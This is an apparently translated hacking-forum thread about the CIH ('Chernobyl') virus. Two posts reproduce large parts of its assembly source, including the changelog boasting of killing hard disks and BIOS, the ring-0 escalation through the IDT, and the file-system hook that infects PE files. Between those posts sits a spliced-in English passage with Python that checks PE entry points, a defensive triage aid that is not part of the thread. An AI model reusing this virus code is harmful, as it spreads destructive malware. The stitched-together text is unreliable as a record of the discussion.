CIH source code

#1  29.04.2008, 20:01  Pavlik (Newbie; registered 11.04.2008; 2 posts; reputation 0)

I have the source code of the "Chernobyl" virus! What can be done with it, knowing assembler?

#2  29.04.2008, 20:03  xcedz (Knows ANTICHAT; registered 14.01.2008; 1,165 posts; reputation 3099)

knowing asm, you can write your own PHP

#3  29.04.2008, 20:11  Isis (Flooder; registered 20.11.2006; 3,316 posts; reputation 2371)

Knowing assembler, you can write Winnie the Pooh

#4  29.04.2008, 20:13  xcedz (Knows ANTICHAT; registered 14.01.2008; 1,165 posts; reputation 3099)

Quote:
Originally posted by Isis
Knowing assembler, you can write Winnie the Pooh

eh, fine then, pour me one or I'm leaving

#5  29.04.2008, 20:18  z01b (Regular; registered 05.01.2007; 508 posts; reputation 1393)

Code:
; ****************************************************************************
; *                      The Virus Program Information                      *
; ****************************************************************************
; *                                                                          *
; *   Designer : CIH                   Source  : TTIT of TATUNG in Taiwan    *
; *   Create Date : 04/26/1998         E-mail  : WinCIH.Tatung@usa.net       *
; *   Modification Time : 06/01/1998   Version : 1.5                         *
; *                                                                          *
; *   Turbo Assembler Version 5.0    : Tasm /m cih                           *
; *   Turbo Link Version 5.01        : Tlink /3 /t cih, cih.exe              *
; *                                                                          *
; *==========================================================================*
; *                           Modification History                          *
; *==========================================================================*
; *     v1.0    1. Create the Virus Program.                                 *
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *             6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *             7. It is also Infected, even the File is Read-Only.          *
; *             8. When the File is Infected, the Modification Date and Time *
; *                of the File also don't be Changed.                        *
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *                Previous FileSystemApiHook, it will Call the Function     *
; *                that the IFS Manager Would Normally Call to Implement     *
; *                this Particular I/O Request.                              *
; *             10. The Virus Size is only 656 Bytes.                        *
; *==========================================================================*
; *     v1.1    1. Especially, the File that be Infected will not Increase   *
; *                it's Size...   ^__^                                       *
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *
; *                When Exception Error Occurs, Our OS System should be in   *
; *                Windows NT. So My Cute Virus will not Continue to Run,    *
; *                it will Jmup to Original Application to Run.              *
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
; *==========================================================================*
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *             2. Modify the Bug of v1.1                                    *
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *
; *==========================================================================*
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
; *==========================================================================*
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *             2. Change the Date of Killing Computers.                     *
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
; ****************************************************************************
; *     v1.5    1. Full Modify the Bug : Change Harddisk Killing Port        *
; *             2. Modify Virus Version Copyright.                           *
; * 06/01/1998  3. Clear Garbage in Source Code.                             *
; *             4. The Virus "Small" Size in 10xx Bytes.                     *
; ****************************************************************************

                .586

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        dd    00000000h, VirusSize

OriginalAppEXE  ENDS

; ****************************************************************************
; *                     My Virus Game                                        *
; ****************************************************************************

; *********************************************************
; *                    Constant Define                    *
; *********************************************************

TRUE            =    1
FALSE            =    0

DEBUG            =    TRUE

IF    DEBUG

        FirstKillHardDiskNumber =       82h
        HookExceptionNumber     =       06h

ELSE

        FirstKillHardDiskNumber =       81h
        HookExceptionNumber     =       04h

ENDIF


FileNameBufferSize    =    7fh

; *********************************************************
; *********************************************************

VirusGame               SEGMENT

                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; *             Ring3 Virus Game Initial Program          *
; *********************************************************

MyVirusStart:
            push    ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************

            lea    eax, [esp-04h*2]
            xor    ebx, ebx
            xchg    eax, fs:[ebx]
            call    @0
@0:
            pop    ebx
            lea    ecx, StopToRunVirusCode-@0[ebx]
            push    ecx
            push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

            push    eax    ;
                        sidt    [esp-02h]      ; Get IDT Base Address
                        pop     ebx            ;
                        add     ebx, HookExceptionNumber*08h+04h; ZF = 0
            cli
                        mov     ebp, [ebx]     ; Get Exception Base
                        mov     bp, [ebx-04h]  ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx]
            push    esi
            mov    [ebx-04h], si    ;
            shr    esi, 16        ; Modify Exception
            mov    [ebx+02h], si    ; Entry Point Address
            pop    esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

            int    HookExceptionNumber; GenerateException
ReturnAddressOfEndException    =    $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

            push    esi
            mov    esi, eax

LoopOfMergeAllVirusCodeSection:

            mov    ecx, [eax-04h]
            rep    movsb
            sub    eax, 08h
            mov    esi, [eax]
            or    esi, esi
            jz    QuitLoopOfMergeAllVirusCodeSection; ZF = 1
            jmp    LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

            pop    esi

; *************************************
; * Generate Exception Again          *
; *************************************

            int    HookExceptionNumber; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE:
            sti
            xor    ebx, ebx
            jmp    RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1            =    StopToRunVirusCode

            xor    ebx, ebx
            mov    eax, fs:[ebx]
            mov    esp, [eax]

RestoreSE:
            pop    dword ptr fs:[ebx]
            pop    eax

; *************************************
; * Return Original App to Execute    *
; *************************************

            pop    ebp
                        push    00401000h      ; Push Original
OriginalAddressOfEntryPoint    =    $-4; App Entry Point to Stack
                         ret    ; Return to Original App Entry Point

; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2            =    MyExceptionHook
            jz    InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

            mov    ecx, dr0
            jecxz    AllocateSystemMemoryPage
            add    dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init:
            mov    [ebx-04h], bp;
            shr    ebp, 16    ; Restore Exception
            mov    [ebx+02h], bp;
            iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

            mov    dr0, ebx; Set the Mark of My Virus Exist in System
            push    00000000fh;
            push    ecx    ;
            push    0ffffffffh;
            push    ecx    ;
            push    ecx    ;
            push    ecx    ;
            push    000000001h;
            push    000000002h;
            int    20h    ; VMMCALL _PageAllocate
_PageAllocate        =    $    ;
            dd    00010053h; Use EAX, ECX, EDX, and flags
            add    esp, 08h*04h
            xchg    edi, eax; EDI = SystemMemory Start Address
            lea    eax, MyVirusStart-@2[esi]
            iretd; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook:

            lea    eax, FileSystemApiHook-@6[edi]

            push    eax ;
            int    20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $
            dd      00400067h; Use EAX, ECX, EDX, and flags
            mov    dr0, eax; Save OldFileSystemApiHook Address
            pop    eax; EAX = FileSystemApiHook Address
        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
            mov    ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
            mov    edx, [ecx]
            mov    OldInstallFileSystemApiHook-@3[eax], edx
        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
            lea    eax, InstallFileSystemApiHook-@3[eax]
            mov    [ecx], eax
            cli
            jmp    ExitRing0Init

; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************

CodeSizeOfMergeVirusCodeSection        =    offset $

; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************

InstallFileSystemApiHook:
            push    ebx
            call    @4;
@4:                ;
            pop    ebx; mov ebx, offset FileSystemApiHook
            add    ebx, FileSystemApiHook-@4;
            push    ebx
            int    20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook    =    $
            dd      00400068h; Use EAX, ECX, EDX, and flags
            pop    eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link Client FileSystemApiHook
            push    dword ptr [esp+8]
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx
            push    eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link My FileSystemApiHook
            push    ebx
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx
            mov    dr0, eax; Adjust OldFileSystemApiHook Address
            pop    eax
            pop    ebx
            ret
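The carrier stub at the top of z01b's listing is a complete, minimal PE header, which makes it a handy fixture for a defensive triage check: does a file's entry point land inside a declared section, is that section executable, and does the entry point sit within the section's real data (VirtualSize) rather than in the file-alignment padding after it? The changelog line "the File that be Infected will not Increase it's Size" describes exactly the pattern where code is tucked into such padding, so an entry point past VirtualSize is worth a closer look. The Python below is an added example, not code from the thread or from the CIH source; it embeds the OriginalAppEXE header bytes from the listing as its sample input. The `parse_pe()`, `locate_entry_point()`, `assess()` and `slack_variant()` names are mine, and the shrunk VirtualSize of 0x10 in `slack_variant()` is a constructed value, not something taken from a real sample.

```python
import struct

# The OriginalAppEXE bytes from the listing above (DOS header and stub, PE
# signature, COFF header, optional header, one section header, padding to
# 0x200 and the first 8 bytes of .text). Copied from the page, not constructed.
CARRIER_HEADER = bytes.fromhex(
    "4d5a900003000000" "04000000ffff0000" "b800000000000000" "4000000000000000"
    + "00" * 24
    + "0000000080000000" "0e1fba0e00b409cd" "21b8014ccd215468" "69732070726f6772"
    "616d2063616e6e6f" "742062652072756e" "20696e20444f5320" "6d6f64652e0d0d0a"
    "2400000000000000" "504500004c010100" "f168203500000000" "00000000e0000f01"
    "0b01050000100000" "0000000000000000" "1010000000100000" "0020000000004000"
    "0010000000020000" "0400000000000000" "0400000000000000" "0020000000020000"
    "0000000002000000" "0000100000100000" "0000100000100000" "0000000010000000"
    + "00" * 128                        # 16 empty data directories
    + "2e74657874000000" "0010000000100000" "0010000000020000" "0000000000000000"
    "0000000020000060"                  # .text: VirtualSize 0x1000, RVA 0x1000, raw 0x1000 at 0x200
    + "00" * 96                         # header padding up to SizeOfHeaders (0x200)
    + "c300000000000000"                # first bytes of .text: a lone RET
)

IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe(data):
    """Parse the DOS, COFF, optional (PE32 only) and section headers of `data`."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _flags = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images are handled here")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base, section_align, file_align = struct.unpack_from("<III", data, opt + 28)
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize,
                         "rawptr": rawptr, "characteristics": characteristics})
        off += 40
    return {"entry_point": entry_point, "image_base": image_base,
            "section_align": section_align, "file_align": file_align,
            "sections": sections}


def locate_entry_point(pe):
    """Map the entry-point RVA to its section and file offset; None if outside every section."""
    ep = pe["entry_point"]
    for s in pe["sections"]:
        span = max(s["vsize"], s["rawsize"])
        if s["va"] <= ep < s["va"] + span:
            delta = ep - s["va"]
            return {"section": s["name"],
                    "file_offset": s["rawptr"] + delta if delta < s["rawsize"] else None,
                    # past the real data but still inside file-aligned raw bytes
                    "in_slack": delta >= s["vsize"],
                    "executable": bool(s["characteristics"] & IMAGE_SCN_MEM_EXECUTE)}
    return None


def assess(data):
    """Return a list of triage findings about the entry point (empty means nothing odd)."""
    pe = parse_pe(data)
    loc = locate_entry_point(pe)
    if loc is None:
        return ["entry point RVA 0x%x lies outside every section" % pe["entry_point"]]
    findings = []
    if not loc["executable"]:
        findings.append("entry point in non-executable section %s" % loc["section"])
    if loc["in_slack"]:
        findings.append("entry point in file-alignment slack of %s (past VirtualSize)"
                        % loc["section"])
    return findings


def slack_variant():
    """Constructed input: the same header with .text VirtualSize shrunk to a
    hypothetical 0x10, so the unchanged entry point 0x1010 now falls in padding.
    This models the header shape the changelog describes; it is not an infected sample."""
    hdr = bytearray(CARRIER_HEADER)
    section_table = 0x80 + 4 + 20 + 0xE0          # e_lfanew + signature + COFF + optional header
    struct.pack_into("<I", hdr, section_table + 8, 0x10)  # VirtualSize field of section 0
    return bytes(hdr)


if __name__ == "__main__":
    for label, blob in (("carrier header", CARRIER_HEADER), ("slack variant", slack_variant())):
        print(label, locate_entry_point(parse_pe(blob)), assess(blob) or "no findings")
```

Run on the listing's own header it reports nothing: the entry point 0x1010 maps to file offset 0x210 inside `.text`, immediately after the 16 bytes the listing shows for that section (the `ret` at 0x200 and the `dd 00000000h, VirusSize` pair), and the `00401000h` that `OriginalAddressOfEntryPoint` pushes is ImageBase 0x400000 plus RVA 0x1000, i.e. that `ret`. On the shrunk-VirtualSize variant the same entry point is flagged as sitting in section slack. Treat this as a triage heuristic rather than a signature: linkers do not place an entry point past VirtualSize, so a hit deserves a closer look, while a clean result says nothing about the rest of the file.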

  #6  
Старый 29.04.2008, 20:19
Аватар для z01b
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию

Код:
; ****************************************************************************
; *            The Virus Program Information                        *
; ****************************************************************************
; *                                                                          *
; *   Designer : CIH                   Source  : TTIT of TATUNG in Taiwan    *
; *   Create Date : 04/26/1998         E-mail  : WinCIH.Tatung@usa.net       *
; *   Modification Time : 06/01/1998   Version : 1.5                         *
; *                                                                          *
; *   Turbo Assembler Version 5.0    : Tasm /m cih                           *
; *   Turbo Link Version 5.01        : Tlink /3 /t cih, cih.exe              *
; *                                         *
; *==========================================================================*
; *            Modification History                                 *
; *==========================================================================*
; *    v1.0    1. Create the Virus Program.                                 *
; *        2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *        4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *        5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *        6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *        7. It is also Infected, even the File is Read-Only.          *
; *        8. When the File is Infected, the Modification Date and Time *
; *           of the File also don't be Changed.                        *
; *        9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *           Previous FileSystemApiHook, it will Call the Function     *
; *           that the IFS Manager Would Normally Call to Implement     *
; *           this Particular I/O Request.                              *
; *           10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; *    v1.1    1. Especially, the File that be Infected will not Increase   *
; *           it's Size...   ^__^                         *
; * 05/15/1998    2. Hook and Modify Structured Exception Handing.         *
; *           When Exception Error Occurs, Our OS System should be in   *
; *           Windows NT. So My Cute Virus will not Continue to Run,    *
; *           it will Jmup to Original Application to Run.             *
; *        3. Use Better Algorithm, Reduce Virus Code Size.         *
; *        4. The Virus "Basic" Size is only 796 Bytes.             *
; *==========================================================================*
; *    v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *        2. Modify the Bug of v1.1                     *
; * 05/21/1998    3. The Virus "Basic" Size is 1003 Bytes.             *
; *==========================================================================*
; *    v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *           So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998    2. The Virus "Basic" Size is 1010 Bytes.             *
; *==========================================================================*
; *    v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *        2. Change the Date of Killing Computers.             *
; * 05/31/1998    3. Modify Virus Version Copyright.                 *
; *        4. The Virus "Basic" Size is 1019 Bytes.             *
; ****************************************************************************
; *     v1.5    1. Full Modify the Bug : Change Harddisk Killing Port        *
; *             2. Modify Virus Version Copyright.                           *
; * 06/01/1998  3. Clear Garbage in Source Code.                             *
; *             4. The Virus "Small" Size in 10xx Bytes.                     *
; ****************************************************************************

                .586

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        dd    00000000h, VirusSize

OriginalAppEXE  ENDS

; ****************************************************************************
; *                     My Virus Game                                        *
; ****************************************************************************

; *********************************************************
; *                    Constant Define                    *
; *********************************************************

TRUE            =    1
FALSE            =    0

DEBUG            =    TRUE

IF    DEBUG

        FirstKillHardDiskNumber =       82h
        HookExceptionNumber     =       06h

ELSE

        FirstKillHardDiskNumber =       81h
        HookExceptionNumber     =       04h

ENDIF


FileNameBufferSize    =    7fh

; *********************************************************
; *********************************************************

VirusGame               SEGMENT

                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; *             Ring3 Virus Game Initial Program          *
; *********************************************************

MyVirusStart:
            push    ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************

            lea    eax, [esp-04h*2]
            xor    ebx, ebx
            xchg    eax, fs:[ebx]
            call    @0
@0:
            pop    ebx
            lea    ecx, StopToRunVirusCode-@0[ebx]
            push    ecx
            push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

            push    eax    ;
                        sidt    [esp-02h]      ; Get IDT Base Address
                        pop     ebx            ;
                        add     ebx, HookExceptionNumber*08h+04h; ZF = 0
            cli
                        mov     ebp, [ebx]     ; Get Exception Base
                        mov     bp, [ebx-04h]  ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx]
            push    esi
            mov    [ebx-04h], si    ;
            shr    esi, 16        ; Modify Exception
            mov    [ebx+02h], si    ; Entry Point Address
            pop    esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

            int    HookExceptionNumber; GenerateException
ReturnAddressOfEndException    =    $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

            push    esi
            mov    esi, eax

LoopOfMergeAllVirusCodeSection:

            mov    ecx, [eax-04h]
            rep    movsb
            sub    eax, 08h
            mov    esi, [eax]
            or    esi, esi
            jz    QuitLoopOfMergeAllVirusCodeSection; ZF = 1
            jmp    LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

            pop    esi

; *************************************
; * Generate Exception Again          *
; *************************************

            int    HookExceptionNumber; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE:
            sti
            xor    ebx, ebx
            jmp    RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1            =    StopToRunVirusCode

            xor    ebx, ebx
            mov    eax, fs:[ebx]
            mov    esp, [eax]

RestoreSE:
            pop    dword ptr fs:[ebx]
            pop    eax

; *************************************
; * Return Original App to Execute    *
; *************************************

            pop     ebp
            push    00401000h                        ; Push Original
OriginalAddressOfEntryPoint    =    $-4             ; App Entry Point to Stack
            ret                                      ; Return to Original App Entry Point

; *********************************************************
